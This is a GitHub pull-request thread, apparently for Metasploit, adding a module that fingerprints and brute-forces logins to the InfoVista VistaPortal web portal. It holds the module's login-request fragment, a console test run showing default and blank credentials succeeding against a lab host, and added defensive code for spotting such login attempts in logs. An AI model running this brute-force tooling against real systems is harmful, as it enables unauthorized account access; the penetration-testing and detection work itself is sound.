added infovista module #1962

Merged
merged 1 commit into from Jun 16, 2013

Contributor

@juushya juushya commented Jun 15, 2013

Added new aux module to enum & brute force InfoVista VistaPortal application.

Contributor

wvu commented Jun 15, 2013

infovista_enum.rb:23 - [ERROR] Unicode detected: "\tINFOVISTA_FINGERPRINT = 'InfoVista\xC2\xAE VistaPortal\xC2\xAE'\n"

I don't know why msftidy doesn't like Unicode, but if I had to guess, it's because not everyone is using Unicode.

Contributor

wvu commented Jun 15, 2013

Is that string the best way to fingerprint the application?

Contributor Author

juushya commented Jun 15, 2013

@wvu-r7 That's the title string when the application is first accessed, pre-authentication. Hence, I used it for fingerprinting. msftidy flags the Unicode, but the module runs fine though.
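For the msftidy Unicode error and the fingerprinting question above, an added example (not the module's code and not from any participant in this thread) of keeping the source file ASCII-only while still matching the title. `INFOVISTA_FINGERPRINT` is the constant named in the msftidy output; `INFOVISTA_TITLE_RE`, `infovista_portal?`, `utf8_literal_check` and the sample bodies are hypothetical, and the code assumes the HTTP client returns the body as a binary (ASCII-8BIT) string.

```ruby
# Added example, not the module's code. Sample bodies below are constructed.
# U+00AE is C2 AE in UTF-8; writing it as \x escapes keeps this file ASCII-only.
INFOVISTA_FINGERPRINT = "InfoVista\xC2\xAE VistaPortal\xC2\xAE".b.freeze

# ASCII-only pattern that tolerates how the (R) sign is encoded in the title.
INFOVISTA_TITLE_RE = %r{<title>[^<]*InfoVista[^<]*VistaPortal[^<]*</title>}i

SAMPLE_UTF8   = "<html><title>InfoVista\xC2\xAE VistaPortal\xC2\xAE</title></html>".b
SAMPLE_LATIN1 = "<title>InfoVista\xAE VistaPortal\xAE</title>".b
SAMPLE_ENTITY = '<title>InfoVista&reg; VistaPortal&reg;</title>'
SAMPLE_OTHER  = '<title>Login</title><p>InfoVista VistaPortal manual</p>'

# Byte-wise check: exact title bytes first, then the looser title pattern.
def infovista_portal?(body)
  return false if body.nil?
  raw = body.b # compare bytes, whatever encoding the HTTP client tagged
  raw.include?(INFOVISTA_FINGERPRINT) || raw.match?(INFOVISTA_TITLE_RE)
end

# The pitfall with a UTF-8 literal: against a binary body that contains high
# bytes, include? raises instead of answering.
def utf8_literal_check(body)
  body.include?("InfoVista\u00AE VistaPortal\u00AE")
rescue Encoding::CompatibilityError => e
  e.class
end
```

The title pattern also matches when the server sends the registered sign as a single ISO-8859-1 byte or as `&reg;`, which the exact byte string does not.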

begin
res = send_request_cgi(
{
'uri' => '/VPortal/mgtconsole/CheckPassword.jsp',
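Review bot: the 'uri' handed to send_request_cgi here is a string literal, so the login path cannot be changed for a deployment that serves the portal somewhere else. Take it from a module option instead (the options table from the post-cleanup test later in this thread lists TARGETURI with this same default) and pass it through normalize_uri before use.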
Contributor

@juushya has shared data via email for verification. During verification, there is something which doesn't match the code. According to the data capture, the POST login authentication requests go against /VPortal/Connect.jsp, and not against /VPortal/mgtconsole/CheckPassword.jsp. @juushya, could you confirm if it is fine?

Contributor Author

@jvazquez-r7 It is fine. Normally, the auth req first actually goes to /VPortal/Connect.jsp, which then forwards it to CheckPassword.jsp. I chose to test the login against CheckPassword.jsp directly. If the login is valid, a 302 to AdminFrame.jsp is received; if not, a 302 to Login.jsp.

Contributor

I see, we should need a data capture which verifies this behavior.
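The login flow described in the review thread above (Connect.jsp forwarding to CheckPassword.jsp, with the 302 target signalling the outcome), seen from the defender's side as an added example that is not part of the pull request: it counts, per client, POSTs that reach CheckPassword.jsp without a preceding Connect.jsp request, together with their outcomes. The log format, the sample lines and the names `summarize_logins` and `suspicious_clients` are assumptions made for the example; it requires an access log that records the `Location` response header.

```ruby
# Added example, not part of the pull request. Log format and sample lines are
# constructed: client "METHOD path" status "Location response header"
CONNECT = '/VPortal/Connect.jsp'
CHECK   = '/VPortal/mgtconsole/CheckPassword.jsp'
LINE_RE = /\A(\S+) "(\S+) (\S+)" (\d{3}) "([^"]*)"\z/

SAMPLE_LOG = <<~LOG
  10.0.0.5 "POST /VPortal/Connect.jsp" 200 ""
  10.0.0.5 "POST /VPortal/mgtconsole/CheckPassword.jsp" 302 "AdminFrame.jsp"
  10.0.0.9 "POST /VPortal/mgtconsole/CheckPassword.jsp" 302 "Login.jsp"
  10.0.0.9 "POST /VPortal/mgtconsole/CheckPassword.jsp" 302 "Login.jsp"
  10.0.0.9 "POST /VPortal/mgtconsole/CheckPassword.jsp" 302 "Login.jsp"
  10.0.0.9 "POST /VPortal/mgtconsole/CheckPassword.jsp" 302 "AdminFrame.jsp"
LOG

# Per-client counts of CheckPassword.jsp POSTs that were not preceded by a
# Connect.jsp POST, and of the two 302 outcomes described in the thread.
def summarize_logins(log)
  via_connect = Hash.new(false)
  stats = Hash.new { |h, k| h[k] = { direct: 0, failed: 0, succeeded: 0 } }
  log.each_line do |line|
    m = LINE_RE.match(line.strip)
    next unless m && m[2] == 'POST'
    client, path, status, location = m[1], m[3].split('?').first, m[4], m[5]
    if path == CONNECT
      via_connect[client] = true
    elsif path == CHECK
      s = stats[client]
      s[:direct] += 1 unless via_connect[client]
      via_connect[client] = false # one Connect.jsp request covers one check
      next unless status == '302'
      s[:failed] += 1 if location.end_with?('Login.jsp')
      s[:succeeded] += 1 if location.end_with?('AdminFrame.jsp')
    end
  end
  stats
end

# Clients with direct CheckPassword.jsp hits and at least min_failed failures.
def suspicious_clients(log, min_failed: 3)
  summarize_logins(log)
    .select { |_, s| s[:direct].positive? && s[:failed] >= min_failed }
    .keys
end
```

A `succeeded` count above zero on a flagged client marks the account to reset first.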

Contributor Author

juushya commented Jun 16, 2013

@jvazquez-r7 emailed the capture to you. 👍

@jvazquez-r7
Contributor

yeah! last capture looks good, proceeding with final testing cleanup and hopefully merging in a while :) thanks @juushya !!

jvazquez-r7 pushed a commit that referenced this pull request Jun 16, 2013
@jvazquez-r7 jvazquez-r7 merged commit ba59434 into rapid7:master Jun 16, 2013
@jvazquez-r7
Contributor

Module verified as working thanks to @juushya's data captures. Thanks! Final cleanup to the module before merging can be found here: 3cd94f5

(fake environment) Test after cleanup:

msf > db_connect msf:@192.168.172.216:5432/msf
[*] Rebuilding the module cache in the background...
msf > workspace -a infovista
[*] Added workspace: infovista
msf > use auxiliary/scanner/http/infovista_enum 
msf auxiliary(infovista_enum) > reload
[*] Reloading module...
msf auxiliary(infovista_enum) > show options

Module options (auxiliary/scanner/http/infovista_enum):

   Name              Current Setting                        Required  Description
   ----              ---------------                        --------  -----------
   BLANK_PASSWORDS   true                                   no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                      yes       How fast to bruteforce, from 0 to 5
   PASSWORD                                                 no        A specific password to authenticate with
   PASS_FILE                                                no        File containing passwords, one per line
   Proxies                                                  no        Use a proxy chain
   RHOSTS                                                   yes       The target address range or CIDR identifier
   RPORT             443                                    yes       The target port
   STOP_ON_SUCCESS   false                                  yes       Stop guessing when a credential works for a host
   TARGETURI         /VPortal/mgtconsole/CheckPassword.jsp  yes       URI for Web login. Default: /VPortal/mgtconsole/CheckPassword.jsp
   THREADS           1                                      yes       The number of concurrent threads
   USERNAME                                                 no        A specific username to authenticate as
   USERPASS_FILE                                            no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      true                                   no        Try the username as the password for all users
   USER_FILE                                                no        File containing usernames, one per line
   VERBOSE           true                                   yes       Whether to print output for all attempts
   VHOST                                                    no        HTTP server virtual host

msf auxiliary(infovista_enum) > set RPORT 80
RPORT => 80
msf auxiliary(infovista_enum) > set SSL false
SSL => false
msf auxiliary(infovista_enum) > set rhosts 192.168.172.192
rhosts => 192.168.172.192
msf auxiliary(infovista_enum) > run

[+] 192.168.172.192:80 - Application version is 4.2
[*] 192.168.172.192:80  - Trying username:"admin" with password:"admin"
[+] 192.168.172.192:80 - SUCCESSFUL LOGIN - "admin":"admin"
[*] 192.168.172.192:80 - Brute-forcing...
[*] 192.168.172.192:80  - [1/1] - Trying username:"" with password:""
[+] 192.168.172.192:80 - SUCCESSFUL LOGIN - "":""
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(infovista_enum) > hosts

Hosts
=====

address          mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----  -------  ---------  -----  -------  ----  --------
192.168.172.192             Unknown                    device         
msf auxiliary(infovista_enum) > creds

Credentials
===========

host             port  user   pass   type      active?
----             ----  ----   ----   ----      -------
192.168.172.192  80    admin  admin  password  true
192.168.172.192  80                  password  true

[*] Found 2 credentials.
msf auxiliary(infovista_enum) > services

Services
========

host             port  proto  name                   state  info
----             ----  -----  ----                   -----  ----
192.168.172.192  80    tcp    infovista vistaportal  open   

@juushya juushya deleted the aux-infovista branch June 16, 2013 16:54